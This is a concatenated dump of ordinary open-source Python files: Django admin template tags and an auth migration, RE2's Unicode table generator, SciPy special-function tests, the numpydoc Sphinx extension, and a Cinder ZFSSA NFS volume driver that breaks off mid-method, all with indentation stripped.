# If list_display_links not defined, add the link tag to the first field
if (first and not cl.list_display_links) or field_name in cl.list_display_links:
table_tag = {True:'th', False:'td'}[first]
first = False
url = cl.url_for_result(result)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
result_id = repr(force_text(value))[1:]
yield format_html('<{0}{1}><a href="{2}"{3}>{4}</a></{5}>',
table_tag,
row_class,
url,
format_html(' onclick="opener.dismissRelatedLookupPopup(window, {0}); return false;"', result_id)
if cl.is_popup else '',
result_repr,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{0}>{1}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{0}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
link = lambda d: cl.get_query_string(d, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.query_set.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.query_set.filter(**{year_field: year_lookup, month_field: month_lookup}).dates(field_name, 'day')
return {
'show': True,
'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.query_set.filter(**{year_field: year_lookup}).dates(field_name, 'month')
return {
'show' : True,
'back': {
'link' : link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = cl.query_set.dates(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render(Context({
'title': spec.title,
'choices' : list(spec.choices(cl)),
'spec': spec,
}))
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
|
gdi2290/rethinkdb
|
refs/heads/next
|
external/re2_20140111/re2/make_unicode_groups.py
|
121
|
#!/usr/bin/python
# Copyright 2008 The RE2 Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Generate C++ tables for Unicode Script and Category groups."""
import sys
import unicode
_header = """
// GENERATED BY make_unicode_groups.py; DO NOT EDIT.
// make_unicode_groups.py >unicode_groups.cc
#include "re2/unicode_groups.h"
namespace re2 {
"""
_trailer = """
} // namespace re2
"""
n16 = 0
n32 = 0
def MakeRanges(codes):
"""Turn a list like [1,2,3,7,8,9] into a range list [[1,3], [7,9]]"""
ranges = []
last = -100
for c in codes:
if c == last+1:
ranges[-1][1] = c
else:
ranges.append([c, c])
last = c
return ranges
def PrintRanges(type, name, ranges):
"""Print the ranges as an array of type named name."""
print "static const %s %s[] = {" % (type, name,)
for lo, hi in ranges:
print "\t{ %d, %d }," % (lo, hi)
print "};"
# def PrintCodes(type, name, codes):
# """Print the codes as an array of type named name."""
# print "static %s %s[] = {" % (type, name,)
# for c in codes:
# print "\t%d," % (c,)
# print "};"
def PrintGroup(name, codes):
"""Print the data structures for the group of codes.
Return a UGroup literal for the group."""
# See unicode_groups.h for a description of the data structure.
# Split codes into 16-bit ranges and 32-bit ranges.
range16 = MakeRanges([c for c in codes if c < 65536])
range32 = MakeRanges([c for c in codes if c >= 65536])
# Pull singleton ranges out of range16.
# code16 = [lo for lo, hi in range16 if lo == hi]
# range16 = [[lo, hi] for lo, hi in range16 if lo != hi]
global n16
global n32
n16 += len(range16)
n32 += len(range32)
ugroup = "{ \"%s\", +1" % (name,)
# if len(code16) > 0:
# PrintCodes("uint16", name+"_code16", code16)
# ugroup += ", %s_code16, %d" % (name, len(code16))
# else:
# ugroup += ", 0, 0"
if len(range16) > 0:
PrintRanges("URange16", name+"_range16", range16)
ugroup += ", %s_range16, %d" % (name, len(range16))
else:
ugroup += ", 0, 0"
if len(range32) > 0:
PrintRanges("URange32", name+"_range32", range32)
ugroup += ", %s_range32, %d" % (name, len(range32))
else:
ugroup += ", 0, 0"
ugroup += " }"
return ugroup
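# Added orientation comment (not part of the original script): for a
# hypothetical group named "Lu" with both range tables, the returned UGroup
# literal is shaped like
#   { "Lu", +1, Lu_range16, <len16>, Lu_range32, <len32> }
# and a missing table is encoded as ", 0, 0".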
def main():
print _header
ugroups = []
for name, codes in unicode.Categories().iteritems():
ugroups.append(PrintGroup(name, codes))
for name, codes in unicode.Scripts().iteritems():
ugroups.append(PrintGroup(name, codes))
print "// %d 16-bit ranges, %d 32-bit ranges" % (n16, n32)
print "const UGroup unicode_groups[] = {";
ugroups.sort()
for ug in ugroups:
print "\t%s," % (ug,)
print "};"
print "const int num_unicode_groups = %d;" % (len(ugroups),)
print _trailer
if __name__ == '__main__':
main()
|
uranusjr/django
|
refs/heads/master
|
django/contrib/auth/migrations/0004_alter_user_username_opts.py
|
134
|
from django.contrib.auth import validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0003_alter_user_email_max_length'),
]
# No database changes; modifies validators and error_messages (#13147).
operations = [
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(
error_messages={'unique': 'A user with that username already exists.'}, max_length=30,
validators=[validators.UnicodeUsernameValidator()],
help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.',
unique=True, verbose_name='username'
),
),
]
|
anntzer/scipy
|
refs/heads/master
|
scipy/special/tests/test_spfun_stats.py
|
12
|
import numpy as np
from numpy.testing import (assert_array_equal,
assert_array_almost_equal_nulp, assert_almost_equal)
from pytest import raises as assert_raises
from scipy.special import gammaln, multigammaln
class TestMultiGammaLn:
def test1(self):
# A test of the identity
# Gamma_1(a) = Gamma(a)
np.random.seed(1234)
a = np.abs(np.random.randn())
assert_array_equal(multigammaln(a, 1), gammaln(a))
def test2(self):
# A test of the identity
# Gamma_2(a) = sqrt(pi) * Gamma(a) * Gamma(a - 0.5)
a = np.array([2.5, 10.0])
result = multigammaln(a, 2)
expected = np.log(np.sqrt(np.pi)) + gammaln(a) + gammaln(a - 0.5)
assert_almost_equal(result, expected)
def test_bararg(self):
assert_raises(ValueError, multigammaln, 0.5, 1.2)
def _check_multigammaln_array_result(a, d):
# Test that the shape of the array returned by multigammaln
# matches the input shape, and that all the values match
# the value computed when multigammaln is called with a scalar.
result = multigammaln(a, d)
assert_array_equal(a.shape, result.shape)
a1 = a.ravel()
result1 = result.ravel()
for i in range(a.size):
assert_array_almost_equal_nulp(result1[i], multigammaln(a1[i], d))
def test_multigammaln_array_arg():
# Check that the array returned by multigammaln has the correct
# shape and contains the correct values. The cases have arrays
# with several different shapes.
# The cases include a regression test for ticket #1849
# (a = np.array([2.0]), an array with a single element).
np.random.seed(1234)
cases = [
# a, d
(np.abs(np.random.randn(3, 2)) + 5, 5),
(np.abs(np.random.randn(1, 2)) + 5, 5),
(np.arange(10.0, 18.0).reshape(2, 2, 2), 3),
(np.array([2.0]), 3),
(np.float64(2.0), 3),
]
for a, d in cases:
_check_multigammaln_array_result(a, d)
|
Jiangshangmin/mpld3
|
refs/heads/master
|
doc/sphinxext/numpy_ext/numpydoc.py
|
50
|
"""
========
numpydoc
========
Sphinx extension that handles docstrings in the Numpy standard format. [1]
It will:
- Convert Parameters etc. sections to field lists.
- Convert See Also section to a See also entry.
- Renumber references.
- Extract the signature from the docstring, if it can't be determined otherwise.
.. [1] http://projects.scipy.org/numpy/wiki/CodingStyleGuidelines#docstring-standard
"""
import os, re, pydoc
from docscrape_sphinx import get_doc_object, SphinxDocString
from sphinx.util.compat import Directive
import inspect
def mangle_docstrings(app, what, name, obj, options, lines,
reference_offset=[0]):
cfg = dict(use_plots=app.config.numpydoc_use_plots,
show_class_members=app.config.numpydoc_show_class_members)
if what == 'module':
# Strip top title
title_re = re.compile(ur'^\s*[#*=]{4,}\n[a-z0-9 -]+\n[#*=]{4,}\s*',
re.I|re.S)
lines[:] = title_re.sub(u'', u"\n".join(lines)).split(u"\n")
else:
doc = get_doc_object(obj, what, u"\n".join(lines), config=cfg)
lines[:] = unicode(doc).split(u"\n")
if app.config.numpydoc_edit_link and hasattr(obj, '__name__') and \
obj.__name__:
if hasattr(obj, '__module__'):
v = dict(full_name=u"%s.%s" % (obj.__module__, obj.__name__))
else:
v = dict(full_name=obj.__name__)
lines += [u'', u'.. htmlonly::', '']
lines += [u' %s' % x for x in
(app.config.numpydoc_edit_link % v).split("\n")]
# replace reference numbers so that there are no duplicates
references = []
for line in lines:
line = line.strip()
m = re.match(ur'^.. \[([a-z0-9_.-])\]', line, re.I)
if m:
references.append(m.group(1))
# start renaming from the longest string, to avoid overwriting parts
references.sort(key=lambda x: -len(x))
if references:
for i, line in enumerate(lines):
for r in references:
if re.match(ur'^\d+$', r):
new_r = u"R%d" % (reference_offset[0] + int(r))
else:
new_r = u"%s%d" % (r, reference_offset[0])
lines[i] = lines[i].replace(u'[%s]_' % r,
u'[%s]_' % new_r)
lines[i] = lines[i].replace(u'.. [%s]' % r,
u'.. [%s]' % new_r)
reference_offset[0] += len(references)
def mangle_signature(app, what, name, obj, options, sig, retann):
# Do not try to inspect classes that don't define `__init__`
if (inspect.isclass(obj) and
(not hasattr(obj, '__init__') or
'initializes x; see ' in pydoc.getdoc(obj.__init__))):
return '', ''
if not (callable(obj) or hasattr(obj, '__argspec_is_invalid_')): return
if not hasattr(obj, '__doc__'): return
doc = SphinxDocString(pydoc.getdoc(obj))
if doc['Signature']:
sig = re.sub(u"^[^(]*", u"", doc['Signature'])
return sig, u''
def setup(app, get_doc_object_=get_doc_object):
global get_doc_object
get_doc_object = get_doc_object_
app.connect('autodoc-process-docstring', mangle_docstrings)
app.connect('autodoc-process-signature', mangle_signature)
app.add_config_value('numpydoc_edit_link', None, False)
app.add_config_value('numpydoc_use_plots', None, False)
app.add_config_value('numpydoc_show_class_members', True, True)
# Extra mangling domains
app.add_domain(NumpyPythonDomain)
app.add_domain(NumpyCDomain)
#------------------------------------------------------------------------------
# Docstring-mangling domains
#------------------------------------------------------------------------------
from docutils.statemachine import ViewList
from sphinx.domains.c import CDomain
from sphinx.domains.python import PythonDomain
class ManglingDomainBase(object):
directive_mangling_map = {}
def __init__(self, *a, **kw):
super(ManglingDomainBase, self).__init__(*a, **kw)
self.wrap_mangling_directives()
def wrap_mangling_directives(self):
for name, objtype in self.directive_mangling_map.items():
self.directives[name] = wrap_mangling_directive(
self.directives[name], objtype)
class NumpyPythonDomain(ManglingDomainBase, PythonDomain):
name = 'np'
directive_mangling_map = {
'function': 'function',
'class': 'class',
'exception': 'class',
'method': 'function',
'classmethod': 'function',
'staticmethod': 'function',
'attribute': 'attribute',
}
class NumpyCDomain(ManglingDomainBase, CDomain):
name = 'np-c'
directive_mangling_map = {
'function': 'function',
'member': 'attribute',
'macro': 'function',
'type': 'class',
'var': 'object',
}
def wrap_mangling_directive(base_directive, objtype):
class directive(base_directive):
def run(self):
env = self.state.document.settings.env
name = None
if self.arguments:
m = re.match(r'^(.*\s+)?(.*?)(\(.*)?', self.arguments[0])
name = m.group(2).strip()
if not name:
name = self.arguments[0]
lines = list(self.content)
mangle_docstrings(env.app, objtype, name, None, None, lines)
self.content = ViewList(lines, self.content.parent)
return base_directive.run(self)
return directive
|
duhzecca/cinder
|
refs/heads/master
|
cinder/volume/drivers/zfssa/zfssanfs.py
|
11
|
# Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance NFS Cinder Volume Driver
"""
import base64
import datetime as dt
import errno
import math
from oslo_config import cfg
from oslo_log import log
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder import exception
from cinder import utils
from cinder.i18n import _, _LE, _LI
from cinder.volume.drivers import nfs
from cinder.volume.drivers.san import san
from cinder.volume.drivers.zfssa import zfssarest
ZFSSA_OPTS = [
cfg.StrOpt('zfssa_data_ip',
help='Data path IP address'),
cfg.StrOpt('zfssa_https_port', default='443',
help='HTTPS port number'),
cfg.StrOpt('zfssa_nfs_mount_options', default='',
help='Options to be passed while mounting share over nfs'),
cfg.StrOpt('zfssa_nfs_pool', default='',
help='Storage pool name.'),
cfg.StrOpt('zfssa_nfs_project', default='NFSProject',
help='Project name.'),
cfg.StrOpt('zfssa_nfs_share', default='nfs_share',
help='Share name.'),
cfg.StrOpt('zfssa_nfs_share_compression', default='off',
choices=['off', 'lzjb', 'gzip-2', 'gzip', 'gzip-9'],
help='Data compression.'),
cfg.StrOpt('zfssa_nfs_share_logbias', default='latency',
choices=['latency', 'throughput'],
help='Synchronous write bias-latency, throughput.'),
cfg.IntOpt('zfssa_rest_timeout',
help='REST connection timeout. (seconds)'),
cfg.BoolOpt('zfssa_enable_local_cache', default=True,
help='Flag to enable local caching: True, False.'),
cfg.StrOpt('zfssa_cache_directory', default='os-cinder-cache',
help='Name of directory inside zfssa_nfs_share where cache '
'volumes are stored.')
]
LOG = log.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(ZFSSA_OPTS)
def factory_zfssa():
return zfssarest.ZFSSANfsApi()
class ZFSSANFSDriver(nfs.NfsDriver):
"""ZFSSA Cinder NFS volume driver.
Version history:
1.0.1:
Backend enabled volume migration.
Local cache feature.
"""
VERSION = '1.0.1'
volume_backend_name = 'ZFSSA_NFS'
protocol = driver_prefix = driver_volume_type = 'nfs'
def __init__(self, *args, **kwargs):
super(ZFSSANFSDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(ZFSSA_OPTS)
self.configuration.append_config_values(san.san_opts)
self.zfssa = None
self._stats = None
def do_setup(self, context):
if not self.configuration.nfs_oversub_ratio > 0:
msg = _("NFS config 'nfs_oversub_ratio' invalid. Must be > 0: "
"%s") % self.configuration.nfs_oversub_ratio
LOG.error(msg)
raise exception.NfsException(msg)
if not (self.configuration.nfs_used_ratio > 0 and
        self.configuration.nfs_used_ratio <= 1):
msg = _("NFS config 'nfs_used_ratio' invalid. Must be > 0 "
"and <= 1.0: %s") % self.configuration.nfs_used_ratio
LOG.error(msg)
raise exception.NfsException(msg)
package = 'mount.nfs'
try:
self._execute(package, check_exit_code=False, run_as_root=True)
except OSError as exc:
if exc.errno == errno.ENOENT:
msg = _('%s is not installed') % package
raise exception.NfsException(msg)
else:
raise
lcfg = self.configuration
LOG.info(_LI('Connecting to host: %s.'), lcfg.san_ip)
host = lcfg.san_ip
user = lcfg.san_login
password = lcfg.san_password
https_port = lcfg.zfssa_https_port
credentials = ['san_ip', 'san_login', 'san_password', 'zfssa_data_ip']
for cred in credentials:
if not getattr(lcfg, cred, None):
exception_msg = _('%s not set in cinder.conf') % cred
LOG.error(exception_msg)
raise exception.CinderException(exception_msg)
self.zfssa = factory_zfssa()
self.zfssa.set_host(host, timeout=lcfg.zfssa_rest_timeout)
auth_str = base64.encodestring('%s:%s' % (user, password))[:-1]
self.zfssa.login(auth_str)
self.zfssa.create_project(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
compression=lcfg.zfssa_nfs_share_compression,
logbias=lcfg.zfssa_nfs_share_logbias)
share_args = {
'sharedav': 'rw',
'sharenfs': 'rw',
'root_permissions': '777',
'compression': lcfg.zfssa_nfs_share_compression,
'logbias': lcfg.zfssa_nfs_share_logbias
}
self.zfssa.create_share(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, share_args)
share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
mountpoint = share_details['mountpoint']
self.mount_path = lcfg.zfssa_data_ip + ':' + mountpoint
https_path = 'https://' + lcfg.zfssa_data_ip + ':' + https_port + \
'/shares' + mountpoint
LOG.debug('NFS mount path: %s', self.mount_path)
LOG.debug('WebDAV path to the share: %s', https_path)
self.shares = {}
mnt_opts = self.configuration.zfssa_nfs_mount_options
self.shares[self.mount_path] = mnt_opts if len(mnt_opts) > 1 else None
# Initialize the WebDAV client
self.zfssa.set_webdav(https_path, auth_str)
# Edit http service so that WebDAV requests are always authenticated
args = {'https_port': https_port,
'require_login': True}
self.zfssa.modify_service('http', args)
self.zfssa.enable_service('http')
if lcfg.zfssa_enable_local_cache:
LOG.debug('Creating local cache directory %s.',
lcfg.zfssa_cache_directory)
self.zfssa.create_directory(lcfg.zfssa_cache_directory)
def _ensure_shares_mounted(self):
try:
self._ensure_share_mounted(self.mount_path)
except Exception as exc:
LOG.error(_LE('Exception during mounting %s.'), exc)
self._mounted_shares = [self.mount_path]
LOG.debug('Available shares %s', self._mounted_shares)
def check_for_setup_error(self):
"""Check that driver can login.
Check also for properly configured pool, project and share
Check that the http and nfs services are enabled
"""
lcfg = self.configuration
self.zfssa.verify_pool(lcfg.zfssa_nfs_pool)
self.zfssa.verify_project(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project)
self.zfssa.verify_share(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
self.zfssa.verify_service('http')
self.zfssa.verify_service('nfs')
def create_snapshot(self, snapshot):
"""Creates a snapshot of a volume."""
LOG.info(_LI('Creating snapshot: %s'), snapshot['name'])
lcfg = self.configuration
snap_name = self._create_snapshot_name()
self.zfssa.create_snapshot(lcfg.zfssa_nfs_pool, lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, snap_name)
src_file = snap_name + '/' + snapshot['volume_name']
try:
self.zfssa.create_snapshot_of_volume_file(src_file=src_file,
dst_file=
snapshot['name'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug('Error thrown during snapshot: %s creation',
snapshot['name'])
finally:
self.zfssa.delete_snapshot(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share, snap_name)
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
LOG.info(_LI('Deleting snapshot: %s'), snapshot['name'])
self.zfssa.delete_snapshot_of_volume_file(src_file=snapshot['name'])
def create_volume_from_snapshot(self, volume, snapshot, method='COPY'):
LOG.info(_LI('Creating volume from snapshot. volume: %s'),
volume['name'])
LOG.info(_LI('Source Snapshot: %s'), snapshot['name'])
self._ensure_shares_mounted()
self.zfssa.create_volume_from_snapshot_file(src_file=snapshot['name'],
dst_file=volume['name'],
method=method)
volume['provider_location'] = self.mount_path
if volume['size'] != snapshot['volume_size']:
try:
self.extend_volume(volume, volume['size'])
except Exception:
vol_path = self.local_path(volume)
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error in extending volume size: Volume: '
'%(volume)s Vol_Size: %(vol_size)d with '
'Snapshot: %(snapshot)s Snap_Size: '
'%(snap_size)d'),
{'volume': volume['name'],
'vol_size': volume['size'],
'snapshot': snapshot['name'],
'snap_size': snapshot['volume_size']})
self._execute('rm', '-f', vol_path, run_as_root=True)
volume_origin = {'origin': snapshot['volume_name']}
self.zfssa.set_file_props(volume['name'], volume_origin)
return {'provider_location': volume['provider_location']}
def create_cloned_volume(self, volume, src_vref):
"""Creates a snapshot and then clones the snapshot into a volume."""
LOG.info(_LI('new cloned volume: %s'), volume['name'])
LOG.info(_LI('source volume for cloning: %s'), src_vref['name'])
snapshot = {'volume_name': src_vref['name'],
'volume_id': src_vref['id'],
'volume_size': src_vref['size'],
'name': self._create_snapshot_name()}
self.create_snapshot(snapshot)
return self.create_volume_from_snapshot(volume, snapshot,
method='MOVE')
def delete_volume(self, volume):
LOG.debug('Deleting volume %s.', volume['name'])
lcfg = self.configuration
try:
vol_props = self.zfssa.get_volume(volume['name'])
except exception.VolumeNotFound:
return
super(ZFSSANFSDriver, self).delete_volume(volume)
if vol_props['origin'].startswith(lcfg.zfssa_cache_directory):
LOG.info(_LI('Checking origin %(origin)s of volume %(volume)s.'),
{'origin': vol_props['origin'],
'volume': volume['name']})
self._check_origin(vol_props['origin'])
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
"""Create a volume efficiently from an existing image.
Verify the image ID being used:
(1) If there is no existing cache volume, create one and transfer
image data to it. Take a snapshot.
(2) If a cache volume already exists, verify whether it has been altered
or updated. If so, try to remove it, and raise an exception if removal
fails. Create a new cache volume as in (1).
Clone a volume from the cache volume and return it to Cinder.
"""
LOG.debug('Cloning image %(image)s to volume %(volume)s',
{'image': image_meta['id'], 'volume': volume['name']})
lcfg = self.configuration
if not lcfg.zfssa_enable_local_cache:
return None, False
# virtual_size is the image's actual size when stored in a volume
# virtual_size is expected to be updated manually through glance
try:
virtual_size = int(image_meta['properties'].get('virtual_size'))
except Exception:
LOG.error(_LE('virtual_size property is not set for the image.'))
return None, False
cachevol_size = int(math.ceil(float(virtual_size) / units.Gi))
if cachevol_size > volume['size']:
exception_msg = (_LE('Image size %(img_size)dGB is larger '
'than volume size %(vol_size)dGB.'),
{'img_size': cachevol_size,
'vol_size': volume['size']})
LOG.error(exception_msg)
return None, False
cache_dir = '%s/' % lcfg.zfssa_cache_directory
updated_at = six.text_type(image_meta['updated_at'].isoformat())
cachevol_props = {
'name': '%sos-cache-vol-%s' % (cache_dir,
image_meta['id']),
'size': cachevol_size,
'updated_at': updated_at,
'image_id': image_meta['id'],
}
try:
cachevol_name = self._verify_cache_volume(context,
image_meta,
image_service,
cachevol_props)
# A cache volume should be ready by now
# Create a clone from the cache volume
cache_vol = {
'name': cachevol_name,
'size': cachevol_size,
'id': image_meta['id'],
}
clone_vol = self.create_cloned_volume(volume, cache_vol)
self._update_origin(volume['name'], cachevol_name)
except exception.VolumeBackendAPIException as exc:
exception_msg = (_LE('Cannot clone image %(image)s to '
'volume %(volume)s. Error: %(error)s.'),
{'volume': volume['name'],
'image': image_meta['id'],
'error': exc.message})
LOG.error(exception_msg)
return None, False
return clone_vol, True
@utils.synchronized('zfssanfs', external=True)
def _verify_cache_volume(self, context, img_meta,
img_service, cachevol_props):
"""Verify if we have a cache volume that we want.
If we don't, create one.
If we do, check whether it has been updated:
* If so, delete it and create a new one.
* If not, we are good.
After the function returns, there should be a cache volume available,
ready for cloning.
"""
cachevol_name = cachevol_props['name']
cache_vol = None
LOG.debug('Verifying cache volume %s:', cachevol_name)
try:
cache_vol = self.zfssa.get_volume(cachevol_name)
except exception.VolumeNotFound:
# There is no existing cache volume, create one:
LOG.debug('Cache volume not found. Creating one...')
return self._create_cache_volume(context,
img_meta,
img_service,
cachevol_props)
# A cache volume does exist, check if it's updated:
if ((cache_vol['updated_at'] != cachevol_props['updated_at']) or
(cache_vol['image_id'] != cachevol_props['image_id'])):
if cache_vol['numclones'] > 0:
# The cache volume is updated, but has clones
exception_msg = (_('Cannot delete '
'cache volume: %(cachevol_name)s. '
'It was updated at %(updated_at)s '
'and currently has %(numclones)d '
'volume instances.'),
{'cachevol_name': cachevol_name,
'updated_at': cachevol_props['updated_at'],
'numclones': cache_vol['numclones']})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
# The cache volume is updated, but has no clone, so we delete it
# and re-create a new one:
cache_vol = {
'provider_location': self.mount_path,
'name': cachevol_name,
}
self.delete_volume(cache_vol)
return self._create_cache_volume(context,
img_meta,
img_service,
cachevol_props)
return cachevol_name
def _create_cache_volume(self, context, img_meta,
img_service, cachevol_props):
"""Create a cache volume from an image.
Returns name of the cache volume.
"""
cache_vol = {
'provider_location': self.mount_path,
'size': cachevol_props['size'],
'name': cachevol_props['name'],
}
LOG.debug('Creating cache volume %s', cache_vol['name'])
try:
super(ZFSSANFSDriver, self).create_volume(cache_vol)
LOG.debug('Copying image data:')
super(ZFSSANFSDriver, self).copy_image_to_volume(context,
cache_vol,
img_service,
img_meta['id'])
except Exception as exc:
exc_msg = (_('Failed to create cache volume %(volume)s. '
'Error: %(err)s'),
{'volume': cache_vol['name'],
'err': six.text_type(exc)})
LOG.error(exc_msg)
self.zfssa.delete_file(cache_vol['name'])
raise exception.VolumeBackendAPIException(data=exc_msg)
cachevol_meta = {
'updated_at': cachevol_props['updated_at'],
'image_id': cachevol_props['image_id'],
}
cachevol_meta.update({'numclones': '0'})
self.zfssa.set_file_props(cache_vol['name'], cachevol_meta)
return cache_vol['name']
def _create_snapshot_name(self):
"""Creates a snapshot name from the date and time."""
return ('cinder-zfssa-nfs-snapshot-%s' %
dt.datetime.utcnow().isoformat())
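# Added note (not in the original driver): the generated name looks like
# 'cinder-zfssa-nfs-snapshot-2015-06-01T12:00:00.000000', where the timestamp
# is whatever datetime.utcnow().isoformat() returned; the example timestamp
# here is hypothetical.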
def _get_share_capacity_info(self):
"""Get available and used capacity info for the NFS share."""
lcfg = self.configuration
share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,
lcfg.zfssa_nfs_project,
lcfg.zfssa_nfs_share)
free = share_details['space_available']
used = share_details['space_total']
return free, used
@utils.synchronized('zfssanfs', external=True)
def _check_origin(self, origin):
"""Verify the cache volume of a bootable volume.
If the cache no longer has clone, it will be deleted.
"""
cachevol_props = self.zfssa.get_volume(origin)
numclones = cachevol_props['numclones']
LOG.debug('Number of clones: %d', numclones)
if numclones <= 1:
# This cache vol does not have any other clone
self.zfssa.delete_file(origin)
else:
cachevol_props = {'numclones': six.text_type(numclones - 1)}
self.zfssa.set_file_props(origin, cachevol_props)
@utils.synchronized('zfssanfs', external=True)
def _update_origin(self, vol_name, cachevol_name):
"""Update WebDAV property of a volume.
WebDAV properties are used to keep track of:
(1) The number of clones of a cache volume.
(2) The cache volume name (origin) of a bootable volume.
To avoid race conditions when multiple volumes are created and need
to be updated, a file lock is used to ensure that the properties are
updated properly.
"""
volume_origin = {'origin': cachevol_name}
self.zfssa.set_file_props(vol_name, volume_origin)
cache_props = self.zfssa.get_volume(cachevol_name)
cache_props.update({'numclones':
six.text_type(cache_props['numclones'] + 1)})
self.zfssa.set_file_props(cachevol_name, cache_props)
def _update_volume_stats(self):
"""Get volume stats from zfssa"""
self._ensure_shares_mounted()
data = {}
lcfg = self.configuration
backend_name = self.configuration.safe_get('volume_backend_name')
data['volume_backend_name'] = backend_name or self.__class__.__name__
data['vendor_name'] = 'Oracle'
data['driver_version'] = self.VERSION
data['storage_protocol'] = self.protocol
asn = self.zfssa.get_asn()
data['location_info'] = '%s:%s' % (asn, lcfg.zfssa_nfs_share)
free, used = self._get_share_capacity_info()
capacity = float(free) + float(used)
ratio_used = used / capacity
data['QoS_support'] = False
data['reserved_percentage'] = 0
if ratio_used > self.configuration.nfs_used_ratio or \
ratio_used >= self.configuration.nfs_oversub_ratio:
data['reserved_percentage'] = 100
data['total_capacity_gb'] = float(capacity) / units.Gi
data['free_capacity_gb'] = float(free) / units.Gi
self._stats = data
def migrate_volume(self, ctxt, volume, host):
LOG.debug('Attempting ZFSSA enabled volume migration. volume: %(id)s, '
